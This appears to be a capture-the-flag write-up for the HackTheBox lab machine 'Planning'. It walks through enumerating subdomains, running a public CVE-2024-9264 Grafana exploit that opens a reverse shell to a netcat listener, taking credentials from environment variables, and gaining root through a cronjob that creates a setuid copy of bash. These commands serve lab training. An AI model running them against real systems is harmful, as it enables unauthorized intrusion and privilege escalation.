Planning

attachments/HackTheBox Planning.png

IP Address: 10.10.11.68

Machine Information

As is common in real life pentests, you will start the Planning box with credentials for the following account:

admin / 0D5oT70Fq13EvB5r

Challenge

Nmap Scan

As a part of the initial reconnaissance, we can perform a Nmap scan against the target system to look the open ports available.

sudo nmap -sS -sV -sC -vv -T5 <--IP Address-->

Pasted image 20250817183429.png

From the Nmap result we can notice that we have just two ports enabled, Port 80 and Port 22.

For easy accessing, let's add the IP Address to our /etc/hosts file with the domain as planning.htb

sudo nano /etc/hosts

Contents:

<--IP Address--> planning.htb

Pasted image 20250817183635.png

Web Application Fuzzing

Browsing through the domain http://planning.htb we are greeted with an education platform page.

Pasted image 20250817184214.png

And looking around the web application we don't find something really that important or a lead to follow along.

Running through fuff for fuzzing for some files and directories also led to nowhere.

Pasted image 20250817184628.png

But! Fuzzing it for virtual sub-domains using the bitquark-subdomains-top100000.txt file of SecList I found a Virtual subdomain.

ffuf -w <--Location to your SecList-->/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u "http://planning.htb" -H "HOST:FUZZ.planning.htb" -fs 178

Pasted image 20250818113937.png

with this found, let's add this too into the /etc/hosts file.

sudo nano /etc/hosts

Content:

<--IP Address--> grafana.planning.htb

Pasted image 20250818114223.png

Browsing to the subdomain http://grafana.planning.htb/ we are greeted with a login page.

Pasted image 20250818114136.png

We can login to this inter face with the given credentials:

  • Username: admin
  • Password: 0D5oT70Fq13EvB5r

Pasted image 20250818114529.png

And we get the dashboard of the Grafana page.

Pasted image 20250818114612.png

Exploiting Grafana

Looking at the version of Grafana installed in the target system. It is Vulnerable to a command injection and local file inclusion (LFI) via SQL expressions

Read More Here

Pasted image 20250818115453.png

Pasted image 20250818115707.png

While searching through the exploit for this Vulnerability, we find a GitHub Repository by z3k0sec show casing an RCE Exploit via SQL

Pasted image 20250818115937.png

So, let's clone this repository on our Kali Linux Machine

git clone https://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit.git

Pasted image 20250818120135.png

Inside the folder, we find the python script called poc.py that we need to execute for receiving a RCE back to our Kali Linux Machine.

The use:

python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

Pasted image 20250818120323.png

So, first let's set up a listener in our terminal.

nc -lvnp 12345

Pasted image 20250818120443.png

Now, run the poc.py file.

python3 poc.py --url http://grafana.planning.htb --username admin --password 0D5oT70Fq13EvB5r --reverse-ip <--Your Machine IP Address--> --reverse-port 12345

Pasted image 20250818120812.png

We get a reverse shell back!

Enumeration of the User!

going through the entire system, we find that we are in a docker container.

Pasted image 20250818121240.png

By further search around, I stumble upon something that looks like a user credentials in the system environment.

env

Pasted image 20250818123143.png

using these credentials, we can try loging in into the system through SSH

ssh <--Username-->@<--IP Address-->

Pasted image 20250818123820.png

And we get the user flag here!

Pasted image 20250818123944.png

Root Hunt

Cronjob

After finding the user flag, in search of further hints, we can see a folder called crontabs in /etc/crontabs that was two .db files in them.

Pasted image 20250818151150.png

This Cronjob has two work to do

  • Backup the root_grafana docker container into a zip file (which is password protected)
  • Run a script cleanup.sh every minute

both of these tasks are done as a root user or root privileges.

Hidden Cronjob!

While looking at the services running and the open ports of these servers, we can notice that there is some locally enabled Port numbers

  • 3000
  • 8000
netstat -tupln

Pasted image 20250818161452.png

These two port numbers are not a default port numbers nor are they accessible externally to the network. That grows our suspension.

So, we can open another terminal and then start a port-forwarding to this port number from our local host using ssh

ssh enzo@<--IP Address--> -L 8000:127.0.0.1:8000

Pasted image 20250818161839.png

Now, in our web browser, we can attempt to open this web-page http://localhost:8000

Pasted image 20250818162143.png

It asks us for the credentials. assuming that we can use the same credentials found from the crontab.db, we can try to login.

  • Username: root

Pasted image 20250818162254.png

And we login!!!!!

Pasted image 20250818162324.png

Here, in this page, we can see the two Cronjbosto be present here.....

Also, we can create our own Cronjobs!!

Pasted image 20250818162452.png

Here, create a new Job with the following parameters.

  • Name: Root Shell
  • Command: cp /bin/bash /tmp/shell && chmod u+s /tmp/shell
  • Schedule: Every minute

Pasted image 20250818163024.png

Now, click on Run Now

Pasted image 20250818163158.png

Pasted image 20250818163216.png

and in the terminal where you had connected the Port-Forwarding you can go to the temp directory and see the bash script present there.

cd /tmp/
ls

Pasted image 20250818163347.png

Now, run the bash script

./shell -p

Pasted image 20250818163553.png

Now, we can print out the root flag!!

cat /root/root.txt

Pasted image 20250818163720.png

And we finish!!!!!!!

Thanks to d00msl4y3r & FisMatHack 😊

Check Out the Walkthrough Video

Table Of Contents
Planning
Machine Information
Challenge
Nmap Scan
Web Application Fuzzing
Exploiting Grafana
Enumeration of the User!
Root Hunt
Cronjob
Hidden Cronjob!